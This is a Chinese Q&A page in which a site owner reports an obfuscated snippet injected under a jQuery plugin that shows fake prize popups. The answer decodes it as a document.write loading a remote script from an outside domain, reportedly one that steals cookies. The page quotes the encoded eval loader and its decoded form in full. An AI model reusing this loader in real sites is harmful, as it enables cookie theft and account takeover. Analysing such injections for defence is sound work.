javascript - 网站被植入中奖代码js
本文介绍了javascript - 网站被植入中奖代码js的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
问 题
最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码
var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);
请问这种原理是什么 怎么能够防范
解决方案
你的jquery插件下载的时候就有这个。
你的网站被黑了。
前面的密文其实就是字符串的unicode码往前减一。
解密后是这个东西
document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");
往页面中插入了一个远程js,是一个典型的xss
攻击案例,为了规避waf
,他并没有使用标准script脚本,以上代码直接执行不会直接加载,而是会在加载下个js脚本的同时加载进来这个远程脚本。
我去看下了下,现在已经不是弹中奖了,而是直接获取cookies,通过cookies可以直接登陆你的账号,如果你的账号是管理员的话。。。
这篇关于javascript - 网站被植入中奖代码js的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文